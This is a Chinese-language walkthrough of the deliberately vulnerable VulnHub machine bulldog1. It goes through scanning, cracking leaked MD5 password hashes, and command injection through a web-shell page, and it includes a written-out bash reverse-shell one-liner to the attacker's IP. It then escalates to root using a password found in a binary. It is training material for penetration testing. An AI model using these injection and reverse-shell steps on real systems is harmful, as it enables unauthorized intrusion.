vulnhub靶场,bulldog1
vulnhub靶场,bulldog1
环境准备
靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/
攻击机:kali(192.168.109.128)
靶机:bulldog1(192.168.109.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.157
使用nmap扫描查看目标靶机端口开放情况
开放端口:23、80、8080
可以开到目标靶机将ssh端口换成了23
浏览器访问目标靶机80端口
翻译其中内容是说此网站已经被黑了,查看源代码也没有发现什么
点击Public Notice跳转到了另一个页面
查看源代码也没有发现什么
网站指纹识别
使用dirb进行网站目录结构扫描
先只观察一下一级目录,访问/admin
网页
看来是Django的后台管理登录页面,使用暴力破解和SQL注入均无效
访问/dev
网页
中间有个web-shell,点击试试
看来必须要登入后台才能进入这个页面,回到上个页面,翻译一下
这里说不确定黑客有没有留下什么痕迹,可能是在提醒我们,看看源代码里面有没有什么东西
果然在源代码里发现了一些加密后的数据,猜测使用了md5进行加密
渗透过程
将这个md5加密后的密文放到解密网站依次进行猜解
成功破解出两个密码,再根据源码前面的对应关系得到两个账号密码,分别是:nick:bulldog,sarah:bulldoglover
再次找到后台登录的地方,使用这两个账号试试能不能登录
可以看到nick用户成功登入后台
再次回到那个webshell的位置
看来这里应该是一个命令执行的位置,输出上面给的命令试试
确实是这样,那可以试着加管道符运行我们想运行的命令
可以看到,运行成功了,那现在就可以反弹shell了
kali终端:
靶机中:
ls&echo "bash -i >& /dev/tcp/192.168.109.128/4444 0>&1" | bash
可以看到kali这边成功反弹回来了一个shell
提权过程
查看用户的sudo权限
没有sudo权限,进入家目录
发现一个bulldogadmin文件,进去看看
又发现一个.hiddenadmindirectory文件
再进去看看
又发现了一个customPermissionApp文件,查看其内容
发现一堆乱码,用strings命令用来提取和显示非文本文件中的文本字符串
猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget
, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget
,H是来混淆的,中间刚好有PADDWORD
使用su命令切换为root用户
这里发现不能使用su命令,这里报的错误是必须要从终端运行,那使用python打开一个新的终端,使用sudo -i
命令试试
可以看到成功切换为root用户,查看当前文件夹,成功获得flag,靶机bulldog1渗透结束
vulnhub靶场,bulldog1相关推荐
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- vulnhub靶场,Monitoring
vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...
- vulnhub靶场{GoldenEye-v1靶场实战}
远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...
- vulnhub靶场,FirstBlood
vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...
- VulnHub靶场LupinOne
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...
- Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...
最新文章
- 查看计算机用户创建时间,敬业签在电脑端怎样查看团签内容的创建时间?
- 【MM模块】Procurement for Stock Material 库存型物料采购相关
- HTML的相关路径与绝对路径的问题---通过网络搜索整理
- CCF201412-1 门禁系统
- oracle asm 概念,ORACLE之ASM概念
- Linux防火墙配置与管理(16)
- Sublime Text for Mac如何支持GBK编码
- Java入门第65课——根据周长计算不同形状图形的面积
- Xilinx ZYNQ Ultrascale+ 性能测试之 Video Multi Scaler (Linux篇)
- 图片怎么无损放大?不影响清晰度这么做
- 中企海外周报 | 传祺GM6将亮相北美车展,锦江都城发力布局全球
- PHP EOF使用说明
- 微信小程序style的动态样式使用-三元表达式
- 极品特效HTML5动画推荐,不看的程序员后悔一辈子
- cath数据库fasta备注_sam's note
- 易事特拟8600万元投资山东潍坊临朐县光伏扶贫BOT项目
- 合泰lcd的c语言程序,合泰单片机HT66F70A LCD12864液晶屏驱动 汇编和c语言都有
- IPHONE省电省流量技巧 电池状况查询
- 闪电邮新建html模板,非常靠谱之网易智能版闪电邮6大新功能评测
- linux所有信号,【转载】Linux 信号列表